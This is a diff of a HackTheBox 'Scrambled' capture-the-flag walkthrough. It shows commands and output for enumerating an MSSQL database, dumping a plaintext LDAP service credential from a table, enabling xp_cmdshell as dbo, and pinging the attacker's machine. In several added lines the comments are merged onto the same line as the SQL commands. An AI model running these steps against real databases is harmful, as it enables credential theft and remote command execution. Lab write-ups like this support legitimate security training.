kashmir54/kashmir54.github.io/_walkthroughs/hackthebox/scrambled/index.md

 ScrambleHR

-# Let's get the tables on the database and its ID for making the task easier
-SQL> select string_agg(concat(name,':',id), '|') from ScrambleHR..sysobjects where xtype='u'
+-- Lets get the tables on the database and its ID for making the task easier SQL> select string_agg(concat(name,':',id), '|') from ScrambleHR..sysobjects where xtype='u'
 ----------------------------------------------------
 Employees:581577110|UserImport:597577167|Timesheets:613577224

-# Get all columns from the employees table (id 581577110)
-SQL> select string_agg(name, '|') from ScrambleHR..syscolumns where id=581577110
+-- Get all columns from the employees table (id 581577110) SQL> select string_agg(name, '|') from ScrambleHR..syscolumns where id=581577110
 ----------------------------------------------------
 EmployeeID|FirstName|Manager|Role|Surname|Title

-# Colujmns from UserImport (kinda interesting with all LDAP user and pass)
-SQL> select string_agg(name, '|') from ScrambleHR..syscolumns where id=597577167
+-- Columns from UserImport (kinda interesting with all LDAP user and pass) SQL> select string_agg(name, '|') from ScrambleHR..syscolumns where id=597577167
 -------------------------------------------------------------
 IncludeGroups|LdapDomain|LdapPwd|LdapUser|RefreshInterval

-# Focus on that LDAP info.
+-- Focus on that LDAP info.
 Retrieve all columns
 SQL> select * from UserImport;
 LdapUser     LdapPwd          LdapDomain  RefreshInterval   IncludeGroups
 --------------------------------------------------------------------
 MiscSvc   ScrambledEggs9900   scrm.local        90               0

-# Wow plaintext passwords, I like them.
-We can try to execute some code with xp_cmdshell
-SQL> exec xp_cmdshell 'ping 10.10.14.3';
+-- Wow plaintext passwords, I like them.
+We can try to execute some code with xp_cmdshell SQL> exec xp_cmdshell 'ping 10.10.14.3';
 [-] ERROR(DC1): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server.
 A system administrator can enable the use of 'xp_cmdshell' by using sp_configure.
 For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.

-# If we are admins, we can reconfigure the execution policies
-SQL> select user;
+-- If we are admins, we can reconfigure the execution policies SQL> select user;
 ---------------------
 dbo

-# We are admins from the database since we are dbo (default admin on MSSQL)
-# Enable execution, run reconfigure (to avoid errors)
+-- We are admins from the database since we are dbo (default admin on MSSQL) -- Enable execution, run reconfigure (to avoid errors) SQL> enable_xp_cmdshell
-SQL> enable_xp_cmdshell
 [*] INFO(DC1): Line 185: Configuration option 'show advanced options' changed from 0 to 1.
 Run the RECONFIGURE statement to install.
 [*] INFO(DC1): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1.
 Run the RECONFIGURE statement to install.

-# Run the ping to our attack machine
+-- Run the ping to our attack machine
 SQL> exec xp_cmdshell 'ping 10.10.14.3';
 ---------------------------------------------
 Pinging 10.10.14.3 with 32 bytes of data: